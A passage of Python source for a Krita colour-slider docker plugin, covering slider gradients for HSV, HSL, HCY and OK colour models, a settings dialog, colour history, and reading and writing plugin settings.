for number in range(points):
rgb = Convert.hcyToRgbF(firstConst, lastConst, number * increment,
ChromaLimit, trc, self.luma)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhcl":
if self.name[5:] == "Chroma":
for number in range(points):
rgb = Convert.okhclToRgbF(firstConst, number * increment, lastConst,
ChromaLimit, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[5:] == "Lightness":
for number in range(points):
rgb = Convert.okhclToRgbF(firstConst, lastConst, number * increment,
ChromaLimit, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsv":
if self.name[5:] == "Saturation":
for number in range(points):
rgb = Convert.okhsvToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[5:] == "Value":
for number in range(points):
rgb = Convert.okhsvToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[:5] == "okhsl":
if self.name[5:] == "Saturation":
for number in range(points):
rgb = Convert.okhslToRgbF(firstConst, number * increment, lastConst, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
elif self.name[5:] == "Lightness":
for number in range(points):
rgb = Convert.okhslToRgbF(firstConst, lastConst, number * increment, trc)
colors.append(Convert.rgbFToInt8(*rgb, trc))
self.slider.setGradientColors(colors)
def blockSignals(self, block: bool):
self.slider.blockSignals(block)
self.spinBox.blockSignals(block)
@classmethod
def updateList(cls, name: str):
if cls.channelList is None:
cls.channelList = []
cls.channelList.append(name)
@classmethod
def getList(cls):
return cls.channelList.copy()
class SliderConfig(QDialog):
def __init__(self, parent):
super().__init__(parent)
self.hcl = parent
self.setWindowTitle("Configure HCL Sliders")
self.setFixedSize(*CONFIG_SIZE)
self.mainLayout = QHBoxLayout(self)
self.loadPages()
def loadPages(self):
self.pageList = QListWidget()
self.pageList.setFixedWidth(SIDEBAR_WIDTH)
self.pageList.setDragEnabled(True)
self.pageList.viewport().setAcceptDrops(True)
self.pageList.setDropIndicatorShown(True)
self.pageList.setDragDropMode(QListWidget.DragDropMode.InternalMove)
self.pages = QStackedWidget()
hidden = ColorChannel.getList()
self.models = {}
for name in self.hcl.displayOrder:
if name[:2] == "ok":
self.models.setdefault(name[:5].upper(), []).append(name)
else:
self.models.setdefault(name[:3].upper(), []).append(name)
hidden.remove(name)
visible = list(self.models.keys())
for name in hidden:
if name[:2] == "ok":
self.models.setdefault(name[:5].upper(), []).append(name)
else:
self.models.setdefault(name[:3].upper(), []).append(name)
self.checkBoxes = {}
for model, channels in self.models.items():
tabs = QTabWidget()
tabs.setMovable(True)
for name in channels:
tab = QWidget()
tabLayout = QVBoxLayout()
tabLayout.setAlignment(Qt.AlignmentFlag.AlignTop)
tab.setLayout(tabLayout)
channel: ColorChannel = getattr(self.hcl, name)
snapGroup = QGroupBox("Cursor Snapping")
snapGroup.setFixedHeight(GROUPBOX_HEIGHT)
snapGroup.setToolTip("Ctrl + Click to snap cursor at intervals")
snapLayout = QHBoxLayout()
interval = QDoubleSpinBox()
interval.setFixedWidth(SPINBOX_WIDTH)
interval.setDecimals(1)
interval.setMinimum(0.1)
snapLayout.addWidget(interval)
intervalLabel = QLabel("Interval")
intervalLabel.setToolTip("Sets the snap interval to amount")
snapLayout.addWidget(intervalLabel)
displacement = QDoubleSpinBox()
displacement.setFixedWidth(SPINBOX_WIDTH)
displacement.setDecimals(1)
snapLayout.addWidget(displacement)
DisplacementLabel = QLabel("Displacement")
DisplacementLabel.setToolTip("Displaces the snap positions by amount")
snapLayout.addWidget(DisplacementLabel)
snapGroup.setLayout(snapLayout)
tabLayout.addWidget(snapGroup)
param = name[len(model):]
if (model == 'HCY' or model == 'OKHCL') and param != 'Chroma':
radioGroup = QGroupBox("Chroma Mode")
radioGroup.setFixedHeight(GROUPBOX_HEIGHT)
radioGroup.setToolTip("Switches how chroma is adjusted \
to stay within the sRGB gamut")
radioLayout = QHBoxLayout()
clip = QRadioButton("Clip")
clip.setToolTip("Clips chroma if it exceeds the srgb gamut when adjusting")
radioLayout.addWidget(clip)
scale = QRadioButton("Scale")
scale.setToolTip("Scales chroma to maintain constant saturation when adjusting")
radioLayout.addWidget(scale)
if channel.scale:
scale.setChecked(True)
else:
clip.setChecked(True)
clip.toggled.connect(channel.clipChroma)
radioGroup.setLayout(radioLayout)
tabLayout.addWidget(radioGroup)
if model == 'HCY' and param == 'Luma':
luma = QCheckBox("Always Luma")
luma.setToolTip("Transfer components to sRGB in linear TRCs")
luma.setChecked(channel.luma)
luma.toggled.connect(self.hcl.setLuma)
tabLayout.addWidget(luma)
if param == 'Hue':
interval.setMaximum(360.0)
interval.setSuffix(u'\N{DEGREE SIGN}')
displacement.setMaximum(359.9)
displacement.setSuffix(u'\N{DEGREE SIGN}')
colorful = QCheckBox("Colorful Gradient")
colorful.setToolTip("Gradient colors will always be at max chroma")
colorful.setChecked(channel.colorful)
colorful.toggled.connect(channel.colorfulHue)
tabLayout.addStretch()
tabLayout.addWidget(colorful)
else:
interval.setMaximum(100.0)
interval.setSuffix('%')
displacement.setSuffix('%')
interval.setValue(channel.slider.interval)
interval.valueChanged.connect(channel.slider.setInterval)
displacement.setValue(channel.slider.displacement)
displacement.valueChanged.connect(channel.slider.setDisplacement)
tabs.addTab(tab, param)
checkBox = QCheckBox()
checkBox.setChecked(not((model in visible) and (name in hidden)))
tab.setEnabled(checkBox.isChecked())
self.checkBoxes[name] = checkBox
tabs.tabBar().setTabButton(tabs.tabBar().count() - 1,
tabs.tabBar().ButtonPosition.LeftSide, checkBox)
checkBox.toggled.connect(tab.setEnabled)
checkBox.stateChanged.connect(self.reorderSliders)
tabs.tabBar().tabMoved.connect(self.reorderSliders)
self.pages.addWidget(tabs)
self.pageList.addItem(model)
item = self.pageList.item(self.pageList.count() - 1)
item.setFlags(item.flags() | Qt.ItemFlag.ItemIsUserCheckable)
item.setCheckState(Qt.CheckState.Checked) if model in visible else item.setCheckState(
Qt.CheckState.Unchecked)
tabs.setEnabled(item.checkState() == Qt.CheckState.Checked)
self.pageList.model().rowsMoved.connect(self.reorderSliders)
self.pageList.itemPressed.connect(self.changePage)
self.pageList.currentTextChanged.connect(self.changePage)
self.pageList.itemChanged.connect(self.toggleModel)
self.others = QPushButton("Others")
self.others.setAutoDefault(False)
self.others.setCheckable(True)
self.others.setFixedWidth(SIDEBAR_WIDTH)
self.others.clicked.connect(self.changeOthers)
history = QGroupBox("Color History")
history.setFixedHeight(GROUPBOX_HEIGHT)
history.setToolTip("Records foreground color when changed")
history.setCheckable(True)
history.setChecked(self.hcl.history.isEnabled())
history.toggled.connect(self.refreshOthers)
memory = QSpinBox()
memory.setFixedWidth(SPINBOX_WIDTH)
memory.setMaximum(999)
memory.setValue(self.hcl.memory)
memory.valueChanged.connect(self.hcl.setMemory)
memoryLabel = QLabel("Memory")
memoryLabel.setToolTip("Limits color history, set to 0 for unlimited")
clearButton = QPushButton("Clear History")
clearButton.setAutoDefault(False)
clearButton.setToolTip("Removes all colors in history")
clearButton.clicked.connect(self.hcl.clearHistory)
historyLayout = QHBoxLayout()
historyLayout.addWidget(memory)
historyLayout.addWidget(memoryLabel)
historyLayout.addWidget(clearButton)
history.setLayout(historyLayout)
syntax = QCheckBox("Color Syntax")
syntax.setToolTip("Panel for hex/oklab/oklch css syntax")
syntax.setChecked(self.hcl.syntax.isEnabled())
syntax.stateChanged.connect(self.refreshOthers)
othersTab = QWidget()
pageLayout = QVBoxLayout()
pageLayout.addSpacing(OTHERS_HEIGHT)
pageLayout.addWidget(history)
pageLayout.addStretch()
pageLayout.addWidget(syntax)
pageLayout.addStretch()
othersTab.setLayout(pageLayout)
othersPage = QTabWidget()
othersPage.addTab(othersTab, "Other Settings")
self.pages.addWidget(othersPage)
listLayout = QVBoxLayout()
listLayout.addWidget(self.pageList)
listLayout.addWidget(self.others)
self.mainLayout.addLayout(listLayout)
self.mainLayout.addWidget(self.pages)
def changePage(self, item: str|QListWidgetItem):
if isinstance(item, QListWidgetItem):
item = item.text()
self.pages.setCurrentIndex(list(self.models.keys()).index(item))
self.others.setChecked(False)
def changeOthers(self):
self.others.setChecked(True)
self.pages.setCurrentIndex(self.pages.count() - 1)
self.pageList.clearSelection()
def refreshOthers(self, state: bool|int):
# toggled vs stateChanged
if isinstance(state, bool):
self.hcl.history.setEnabled(state)
else:
state = state == Qt.CheckState.Checked
self.hcl.syntax.setEnabled(state)
# Refresh hcl layout
self.hcl.clearOthers()
self.hcl.displayOthers()
def reorderSliders(self):
# Get new display order
self.hcl.displayOrder = []
for row in range(self.pageList.count()):
item = self.pageList.item(row)
if item.checkState() == Qt.CheckState.Checked:
model = item.text()
tabs = self.pages.widget(list(self.models.keys()).index(model))
for index in range(tabs.count()):
# visible tabs have '&' in text used for shortcut
param = tabs.tabText(index).replace('&', '')
name = f"{model.lower()}{param}"
if self.checkBoxes[name].isChecked():
self.hcl.displayOrder.append(name)
# Refresh channel layout
self.hcl.clearChannels()
self.hcl.displayChannels()
def toggleModel(self, item: QListWidgetItem):
tabs = self.pages.widget(list(self.models.keys()).index(item.text()))
tabs.setEnabled(item.checkState() == Qt.CheckState.Checked)
self.reorderSliders()
def closeEvent(self, event):
self.hcl.writeSettings()
event.accept()
class HCLSliders(DockWidget):
def __init__(self):
super().__init__()
self.setWindowTitle(DOCKER_NAME)
mainWidget = QWidget(self)
mainWidget.setContentsMargins(2, 1, 2, 1)
self.setWidget(mainWidget)
self.mainLayout = QVBoxLayout(mainWidget)
self.mainLayout.setSpacing(2)
self.config = None
self.document = None
self.memory = 30
self.trc = "sRGB"
self.notation = NOTATION[0]
self.text = ""
self.pressed = False
self.editing = False
self.pastColors = []
self.loadChannels()
self.history = ColorHistory(self)
self.loadSyntax()
self.readSettings()
self.displayChannels()
self.displayOthers()
self.updateNotations()
def colorDisplay(self):
# load into channel layout to prevent alignment issue when channels empty
layout = QHBoxLayout()
layout.setSpacing(2)
self.color = ColorDisplay(self)
self.color.setFixedHeight(DISPLAY_HEIGHT)
layout.addWidget(self.color)
button = QPushButton()
button.setIcon(Application.icon('configure'))
button.setFlat(True)
button.setFixedSize(DISPLAY_HEIGHT, DISPLAY_HEIGHT)
button.setIconSize(QSize(DISPLAY_HEIGHT - 2, DISPLAY_HEIGHT - 2))
button.setToolTip("Configure HCL Sliders")
button.clicked.connect(self.openConfig)
layout.addWidget(button)
self.timer = QTimer()
self.timer.timeout.connect(self.getKritaColors)
self.singleShot = QTimer()
self.singleShot.setSingleShot(True)
self.singleShot.timeout.connect(self.setHistory)
return layout
def loadChannels(self):
self.channelLayout = QVBoxLayout()
self.channelLayout.setAlignment(Qt.AlignmentFlag.AlignTop)
self.channelLayout.setSpacing(2)
self.channelLayout.addLayout(self.colorDisplay())
self.channelLayout.addSpacing(1)
self.hsvHue = ColorChannel("hsvHue", self)
self.hsvSaturation = ColorChannel("hsvSaturation", self)
self.hsvValue = ColorChannel("hsvValue", self)
self.hslHue = ColorChannel("hslHue", self)
self.hslSaturation = ColorChannel("hslSaturation", self)
self.hslLightness = ColorChannel("hslLightness", self)
self.hcyHue = ColorChannel("hcyHue", self)
self.hcyHue.scale = False
self.hcyChroma = ColorChannel("hcyChroma", self)
self.hcyLuma = ColorChannel("hcyLuma", self)
self.hcyLuma.scale = False
self.okhclHue = ColorChannel("okhclHue", self)
self.okhclHue.scale = False
self.okhclChroma = ColorChannel("okhclChroma", self)
self.okhclLightness = ColorChannel("okhclLightness", self)
self.okhclLightness.scale = False
self.okhsvHue = ColorChannel("okhsvHue", self)
self.okhsvSaturation = ColorChannel("okhsvSaturation", self)
self.okhsvValue = ColorChannel("okhsvValue", self)
self.okhslHue = ColorChannel("okhslHue", self)
self.okhslSaturation = ColorChannel("okhslSaturation", self)
self.okhslLightness = ColorChannel("okhslLightness", self)
self.mainLayout.addLayout(self.channelLayout)
def loadSyntax(self):
self.prevNotation = QPushButton()
self.prevNotation.setFlat(True)
self.prevNotation.setFixedSize(CHANNEL_HEIGHT - 1, CHANNEL_HEIGHT - 1)
self.prevNotation.setIcon(Application.icon('arrow-left'))
self.prevNotation.setIconSize(QSize(CHANNEL_HEIGHT - 5, CHANNEL_HEIGHT - 5))
self.prevNotation.clicked.connect(self.switchNotation)
self.nextNotation = QPushButton()
self.nextNotation.setFlat(True)
self.nextNotation.setFixedSize(CHANNEL_HEIGHT - 1, CHANNEL_HEIGHT - 1)
self.nextNotation.setIcon(Application.icon('arrow-right'))
self.nextNotation.setIconSize(QSize(CHANNEL_HEIGHT - 5, CHANNEL_HEIGHT - 5))
self.nextNotation.clicked.connect(self.switchNotation)
self.syntax = QLineEdit()
self.syntax.setFixedHeight(CHANNEL_HEIGHT - 1)
self.syntax.setAlignment(Qt.AlignmentFlag.AlignCenter)
self.syntax.editingFinished.connect(self.parseSyntax)
def readSettings(self):
channels = ColorChannel.getList()
for name in channels:
settings: list = Application.readSetting(DOCKER_NAME, name, "").split(",")
if len(settings) > 1:
channel: ColorChannel = getattr(self, name)
try:
channel.slider.setInterval(float(settings[0]))
except ValueError:
print(f"Invalid interval amount for {name}")
try:
channel.slider.setDisplacement(float(settings[1]))
except ValueError:
print(f"Invalid displacement amount for {name}")
if (name[:3] == "hcy" or name[:5] == "okhcl") and name[-6:] != "Chroma":
channel.scale = settings[2] == "True"
if name[-3:] == "Hue":
if len(settings) > 3:
channel.colorful = settings[3] == "True"
else:
channel.colorful = settings[2] == "True"
if name[:3] == "hcy":
channel.luma = settings[-1] == "True"
self.displayOrder = []
empty = False
displayed = Application.readSetting(DOCKER_NAME, "displayed", "").split(",")
for name in displayed:
if name in channels:
self.displayOrder.append(name)
elif name == "None":
empty = True
break
if not self.displayOrder and not empty:
self.displayOrder = channels
history = Application.readSetting(DOCKER_NAME, "history", "").split(",")
if len(history) == 2:
self.history.setEnabled(history[0] != "False")
try:
memory = int(history[1])
if 0 <= memory <= 999:
self.memory = memory
except ValueError:
("Invalid memory value")
syntax = Application.readSetting(DOCKER_NAME, "syntax", "").split(",")
if len(syntax) == 2:
self.syntax.setEnabled(syntax[0] != "False")
notation = syntax[1]
if notation in NOTATION:
self.notation = notation
def writeSettings(self):
Application.writeSetting(DOCKER_NAME, "displayed", ",".join(self.displayOrder) if self.displayOrder else "None")
for name in ColorChannel.getList():
settings = []
channel: ColorChannel = getattr(self, name)
settings.append(str(channel.slider.interval))
settings.append(str(channel.slider.displacement))
if (name[:3] == "hcy" or name[:5] == "okhcl") and name[-6:] != "Chroma":
settings.append(str(channel.scale))
if name[-3:] == "Hue":
settings.append(str(channel.colorful))
if name[:3] == "hcy":
settings.append(str(channel.luma))
Application.writeSetting(DOCKER_NAME, name, ",".join(settings))
history = [str(self.history.isEnabled()), str(self.memory)]
Application.writeSetting(DOCKER_NAME, "history", ",".join(history))
syntax = [str(self.syntax.isEnabled()), self.notation]
Application.writeSetting(DOCKER_NAME, "syntax", ",".join(syntax))
def displayChannels(self):
prev = ""
for name in self.displayOrder:
if MODEL_SPACING:
model = name[:5] if name[:2] == "ok" else name[:3]
if prev and prev != model:
self.channelLayout.addSpacing(MODEL_SPACING)
prev = model
channel = getattr(self, name)
channel.layout.addWidget(channel.label)
channel.layout.addWidget(channel.slider)
channel.layout.addWidget(channel.spinBox)
self.channelLayout.addLayout(channel.layout)
def clearChannels(self):
# first 2 items in channelLayout is color display and spacing
for i in reversed(range(self.channelLayout.count() - 2)):
item = self.channelLayout.itemAt(i + 2)
layout = item.layout()
if layout:
for index in reversed(range(layout.count())):
widget = layout.itemAt(index).widget()
layout.removeWidget(widget)
widget.setParent(None)
self.channelLayout.removeItem(item)
def displayOthers(self):
if self.history.isEnabled():
self.mainLayout.addSpacing(1)
self.mainLayout.addWidget(self.history)
if self.syntax.isEnabled():
self.mainLayout.addSpacing(1)
syntaxLayout = QHBoxLayout()
syntaxLayout.addWidget(self.prevNotation)
syntaxLayout.addWidget(self.syntax)
syntaxLayout.addWidget(self.nextNotation)
self.mainLayout.addLayout(syntaxLayout)
def clearOthers(self):
# first item in mainLayout is channelLayout
for i in reversed(range(self.mainLayout.count() - 1)):
item = self.mainLayout.itemAt(i + 1)
widget = item.widget()
if widget:
self.mainLayout.removeWidget(widget)
widget.setParent(None)
else:
layout = item.layout()
if layout:
for index in reversed(range(layout.count())):
widget = layout.itemAt(index).widget()
layout.removeWidget(widget)
widget.setParent(None)
self.mainLayout.removeItem(item)
def openConfig(self):
if self.config is None:
self.config = SliderConfig(self)
self.config.show()
def profileTRC(self, profile: str):
if profile in SRGB:
return "sRGB"
elif profile in LINEAR:
return "linear"
print("Incompatible profile")
return self.trc
def setMemory(self, memory: int):
self.memory = memory
def setPressed(self, pressed: bool):
self.pressed = pressed
def finishEditing(self):
self.editing = False
def getKritaColors(self):
view = Application.activeWindow().activeView()
if not view.visible():
return
if not self.pressed and not self.editing:
# add to color history after slider sets color
if self.color.isChanged() and self.color.current:
self.setHistory()
foreground = view.foregroundColor()
self.color.setForeGroundColor(foreground)
background = view.backgroundColor()
self.color.setBackGroundColor(background)
if self.color.isChanged():
if self.color.bgMode:
self.color.setCurrentColor(background)
else:
self.color.setCurrentColor(foreground)
current = self.color.current
rgb = tuple(current.componentsOrdered()[:3])
if current.colorModel() != "RGBA":
if current.colorModel() == "A" or current.colorModel() == "GRAYA":
rgb = (rgb[0], rgb[0], rgb[0])
else:
return
trc = self.profileTRC(current.colorProfile())
self.updateSyntax(rgb, trc)
if trc != self.trc:
rgb = Convert.rgbToTRC(rgb, self.trc)
self.updateChannels(rgb)
# add to color history after krita changes color
if not self.singleShot.isActive():
self.color.recent = current
self.singleShot.start(DELAY)
def blockChannels(self, block: bool):
# hsv
self.hsvHue.blockSignals(block)
self.hsvSaturation.blockSignals(block)
self.hsvValue.blockSignals(block)
# hsl
self.hslHue.blockSignals(block)
self.hslSaturation.blockSignals(block)
self.hslLightness.blockSignals(block)
# hcy
self.hcyHue.blockSignals(block)
self.hcyChroma.blockSignals(block)
self.hcyLuma.blockSignals(block)
# okhcl
self.okhclHue.blockSignals(block)
self.okhclChroma.blockSignals(block)
self.okhclLightness.blockSignals(block)
# okhsv
self.okhsvHue.blockSignals(block)
self.okhsvSaturation.blockSignals(block)
self.okhsvValue.blockSignals(block)
# okhsl
self.okhslHue.blockSignals(block)
self.okhslSaturation.blockSignals(block)
self.okhslLightness.blockSignals(block)
def updateChannels(self, values: tuple|float, name: str=None, widget: str=None):
self.timer.stop()
self.blockChannels(True)
if type(values) is tuple:
# update color from krita that is not adjusted by this plugin
self.setChannelValues("hsv", values)
self.setChannelValues("hsl", values)
self.setChannelValues("hcy", values)
self.setChannelValues("okhcl", values)
self.setChannelValues("okhsv", values)
self.setChannelValues("okhsl", values)
else:
# update slider if spinbox adjusted vice versa
channel: ColorChannel = getattr(self, name)
channelWidget = getattr(channel, widget)
channelWidget.setValue(values)
if widget == "slider":
# prevent getKritaColors when still editing spinBox
self.editing = True
# adjusting hsv sliders
if name[:3] == "hsv":
hue = self.hsvHue.value()
rgb = Convert.hsvToRgbF(hue, self.hsvSaturation.value(),
self.hsvValue.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsl", rgb, hue)
if self.hcyLuma.luma or self.trc == "sRGB":
self.setChannelValues("hcy", rgb, hue)
else:
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb)
self.setChannelValues("okhsv", rgb)
self.setChannelValues("okhsl", rgb)
# adjusting hsl sliders
elif name[:3] == "hsl":
hue = self.hslHue.value()
rgb = Convert.hslToRgbF(hue, self.hslSaturation.value(),
self.hslLightness.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsv", rgb, hue)
if self.hcyLuma.luma or self.trc == "sRGB":
self.setChannelValues("hcy", rgb, hue)
else:
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb)
self.setChannelValues("okhsv", rgb)
self.setChannelValues("okhsl", rgb)
# adjusting hcy sliders
elif name[:3] == "hcy":
hue = self.hcyHue.value()
chroma = self.hcyChroma.value()
limit = -1
if channel.scale:
if self.hcyChroma.limit > 0:
self.hcyChroma.clip = chroma
limit = self.hcyChroma.limit
else:
if self.hcyChroma.clip == 0:
self.hcyChroma.clip = chroma
else:
chroma = self.hcyChroma.clip
rgb = Convert.hcyToRgbF(hue, chroma, self.hcyLuma.value(),
limit, self.trc, channel.luma)
self.setKritaColor(rgb)
if name[-6:] != "Chroma":
hcy = Convert.rgbFToHcy(*rgb, hue, self.trc, channel.luma)
self.hcyChroma.setLimit(hcy[3])
self.hcyChroma.setValue(hcy[1])
# relative luminance doesnt match luma in hue
if channel.luma or self.trc == "sRGB":
self.setChannelValues("hsv", rgb, hue)
self.setChannelValues("hsl", rgb, hue)
else:
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("okhcl", rgb)
self.setChannelValues("okhsv", rgb)
self.setChannelValues("okhsl", rgb)
# adjusting okhcl sliders
elif name[:5] == "okhcl":
hue = self.okhclHue.value()
chroma = self.okhclChroma.value()
limit = -1
if channel.scale:
if self.okhclChroma.limit > 0:
self.okhclChroma.clip = chroma
limit = self.okhclChroma.limit
else:
if self.okhclChroma.clip == 0:
self.okhclChroma.clip = chroma
else:
chroma = self.okhclChroma.clip
rgb = Convert.okhclToRgbF(hue, chroma, self.okhclLightness.value(), limit, self.trc)
self.setKritaColor(rgb)
if name[-6:] != "Chroma":
okhcl = Convert.rgbFToOkhcl(*rgb, hue, self.trc)
self.okhclChroma.setLimit(okhcl[3])
self.okhclChroma.setValue(okhcl[1])
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhsv", rgb, hue)
self.setChannelValues("okhsl", rgb, hue)
# adjusting okhsv sliders
elif name[:5] == "okhsv":
hue = self.okhsvHue.value()
rgb = Convert.okhsvToRgbF(hue, self.okhsvSaturation.value(),
self.okhsvValue.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb, hue)
self.setChannelValues("okhsl", rgb, hue)
# adjusting okhsl sliders
elif name[:5] == "okhsl":
hue = self.okhslHue.value()
rgb = Convert.okhslToRgbF(hue, self.okhslSaturation.value(),
self.okhslLightness.value(), self.trc)
self.setKritaColor(rgb)
self.setChannelValues("hsv", rgb)
self.setChannelValues("hsl", rgb)
self.setChannelValues("hcy", rgb)
self.setChannelValues("okhcl", rgb, hue)
self.setChannelValues("okhsv", rgb, hue)
self.updateChannelGradients()
self.blockChannels(False)
if TIME:
self.timer.start(TIME)
def updateChannelGradients(self, channels: str=None):
if not channels or channels == "hsv":
self.hsvHue.updateGradientColors(self.hsvSaturation.value(), self.hsvValue.value(),
self.trc)
self.hsvSaturation.updateGradientColors(self.hsvHue.value(), self.hsvValue.value(),
self.trc)
self.hsvValue.updateGradientColors(self.hsvHue.value(), self.hsvSaturation.value(),
self.trc)
if not channels or channels == "hsl":
self.hslHue.updateGradientColors(self.hslSaturation.value(), self.hslLightness.value(),
self.trc)
self.hslSaturation.updateGradientColors(self.hslHue.value(), self.hslLightness.value(),
self.trc)
self.hslLightness.updateGradientColors(self.hslHue.value(), self.hslSaturation.value(),
self.trc)
if not channels or channels == "hcy":
hcyClip = self.hcyChroma.value()
if self.hcyChroma.clip > 0:
hcyClip = self.hcyChroma.clip
if self.hcyHue.scale:
self.hcyHue.updateGradientColors(self.hcyChroma.value(), self.hcyLuma.value(),
self.trc, self.hcyChroma.limit)
else:
self.hcyHue.updateGradientColors(hcyClip, self.hcyLuma.value(), self.trc)
self.hcyChroma.updateGradientColors(self.hcyHue.value(), self.hcyLuma.value(),
self.trc, self.hcyChroma.limit)
if self.hcyLuma.scale:
self.hcyLuma.updateGradientColors(self.hcyHue.value(), self.hcyChroma.value(),
self.trc, self.hcyChroma.limit)
else:
self.hcyLuma.updateGradientColors(self.hcyHue.value(), hcyClip, self.trc)
if not channels or channels == "okhcl":
okhclClip = self.okhclChroma.value()
if self.okhclChroma.clip > 0:
okhclClip = self.okhclChroma.clip
if self.okhclHue.scale:
self.okhclHue.updateGradientColors(self.okhclChroma.value(), self.okhclLightness.value(),
self.trc, self.okhclChroma.limit)
else:
self.okhclHue.updateGradientColors(okhclClip, self.okhclLightness.value(), self.trc)
self.okhclChroma.updateGradientColors(self.okhclHue.value(), self.okhclLightness.value(),
self.trc, self.okhclChroma.limit)
if self.okhclLightness.scale:
self.okhclLightness.updateGradientColors(self.okhclHue.value(), self.okhclChroma.value(),
self.trc, self.okhclChroma.limit)
else:
self.okhclLightness.updateGradientColors(self.okhclHue.value(), okhclClip, self.trc)
if not channels or channels == "okhsv":
self.okhsvHue.updateGradientColors(self.okhsvSaturation.value(),
self.okhsvValue.value(), self.trc)
self.okhsvSaturation.updateGradientColors(self.okhsvHue.value(),
self.okhsvValue.value(), self.trc)
self.okhsvValue.updateGradientColors(self.okhsvHue.value(),
self.okhsvSaturation.value(), self.trc)
if not channels or channels == "okhsl":
self.okhslHue.updateGradientColors(self.okhslSaturation.value(),
self.okhslLightness.value(), self.trc)
self.okhslSaturation.updateGradientColors(self.okhslHue.value(),
self.okhslLightness.value(), self.trc)
self.okhslLightness.updateGradientColors(self.okhslHue.value(),
self.okhslSaturation.value(), self.trc)
def setChannelValues(self, channels: str, rgb: tuple, hue: float=-1):
if channels == "hsv":
hsv = Convert.rgbFToHsv(*rgb, self.trc)
if hue != -1:
self.hsvHue.setValue(hue)
elif hsv[1] > 0:
self.hsvHue.setValue(hsv[0])
if hsv[2] > 0:
self.hsvSaturation.setValue(hsv[1])
self.hsvValue.setValue(hsv[2])
elif channels == "hsl":
hsl = Convert.rgbFToHsl(*rgb, self.trc)
if hue != -1:
self.hslHue.setValue(hue)
elif hsl[1] > 0:
self.hslHue.setValue(hsl[0])
if hsl[2] > 0:
self.hslSaturation.setValue(hsl[1])
self.hslLightness.setValue(hsl[2])
elif channels == "hcy":
self.hcyChroma.clip = 0.0
hcy = Convert.rgbFToHcy(*rgb, self.hcyHue.value(), self.trc, self.hcyLuma.luma)
if hue != -1:
self.hcyHue.setValue(hue)
elif hcy[1] > 0:
self.hcyHue.setValue(hcy[0])
# must always set limit before setting chroma value
self.hcyChroma.setLimit(hcy[3])
self.hcyChroma.setValue(hcy[1])
self.hcyLuma.setValue(hcy[2])
elif channels == "okhcl":
self.okhclChroma.clip = 0.0
okhcl = Convert.rgbFToOkhcl(*rgb, self.okhclHue.value(), self.trc)
if hue != -1:
self.okhclHue.setValue(hue)
else:
self.okhclHue.setValue(okhcl[0])
# must always set limit before setting chroma value
self.okhclChroma.setLimit(okhcl[3])
self.okhclChroma.setValue(okhcl[1])
self.okhclLightness.setValue(okhcl[2])
elif channels == "okhsv":
okhsv = Convert.rgbFToOkhsv(*rgb, self.trc)
if hue != -1:
self.okhsvHue.setValue(hue)
elif okhsv[1] > 0:
self.okhsvHue.setValue(okhsv[0])
if okhsv[2] > 0:
self.okhsvSaturation.setValue(okhsv[1])
self.okhsvValue.setValue(okhsv[2])
elif channels == "okhsl":
okhsl = Convert.rgbFToOkhsl(*rgb, self.trc)
if hue != -1:
self.okhslHue.setValue(hue)
elif okhsl[1] > 0:
self.okhslHue.setValue(okhsl[0])
if okhsl[2] > 0:
self.okhslSaturation.setValue(okhsl[1])
self.okhslLightness.setValue(okhsl[2])
def makeManagedColor(self, rgb: tuple, profile: str=None):
model = "RGBA"
depth = self.document.colorDepth()
if not profile:
if self.trc == "sRGB":
profile = SRGB[0]
else:
profile = LINEAR[0]
elif profile not in Application.profiles(model, depth):
models = filter(lambda cm: cm != "RGBA", Application.colorModels())
for cm in models:
if profile in Application.profiles(cm, depth):
model = cm
break
color = ManagedColor(model, depth, profile)
components = color.components()
# support for other models in the future
if model == "RGBA":
# unordered sequence is BGRA for uint but RGBA for float
if depth[0] == "U":
components[0] = rgb[2]
components[1] = rgb[1]
components[2] = rgb[0]
else:
components[0] = rgb[0]
components[1] = rgb[1]
components[2] = rgb[2]
components[3] = 1.0
color.setComponents(components)
return color
elif model == "A" or model == "GRAYA":
components[0] = rgb[0]
components[1] = 1.0
color.setComponents(components)
return color
def setKritaColor(self, rgb: tuple):
view = Application.activeWindow().activeView()
if not view.visible():
return
color = self.makeManagedColor(rgb)
if color:
self.color.setCurrentColor(color)
self.updateSyntax(rgb, self.trc)
if self.color.bgMode:
view.setBackGroundColor(color)
else:
view.setForeGroundColor(color)
self.color.recent = color
def setLuma(self, luma: bool):
self.timer.stop()
self.blockChannels(True)
self.hcyHue.luma = luma
self.hcyChroma.luma = luma
self.hcyLuma.luma = luma
if self.color.current:
rgb = tuple(self.color.current.componentsOrdered()[:3])
trc = self.profileTRC(self.color.current.colorProfile())
if trc != self.trc:
rgb = Convert.rgbToTRC(rgb, self.trc)
if luma or self.trc == "sRGB":
self.setChannelValues("hcy", rgb, self.hsvHue.value())
else:
self.setChannelValues("hcy", rgb)
self.updateChannelGradients("hcy")
self.blockChannels(False)
if TIME:
self.timer.start(TIME)
def setHistory(self):
if self.color.isChanging():
# allow getKritaColors to start timer for set history
self.color.current = None
return
current = self.color.current
rgb = tuple(current.componentsOrdered()[:3])
if current.colorModel() == "A" or current.colorModel() == "GRAYA":
rgb = (rgb[0], rgb[0], rgb[0])
profile = current.colorProfile()
color = (rgb, profile)
if color in self.pastColors:
index = self.pastColors.index(color)
if index:
self.pastColors.pop(index)
self.pastColors.insert(0, color)
item = self.history.takeItem(index)
self.history.insertItem(0, item)
else:
self.pastColors.insert(0, color)
pixmap = QPixmap(HISTORY_HEIGHT, HISTORY_HEIGHT)
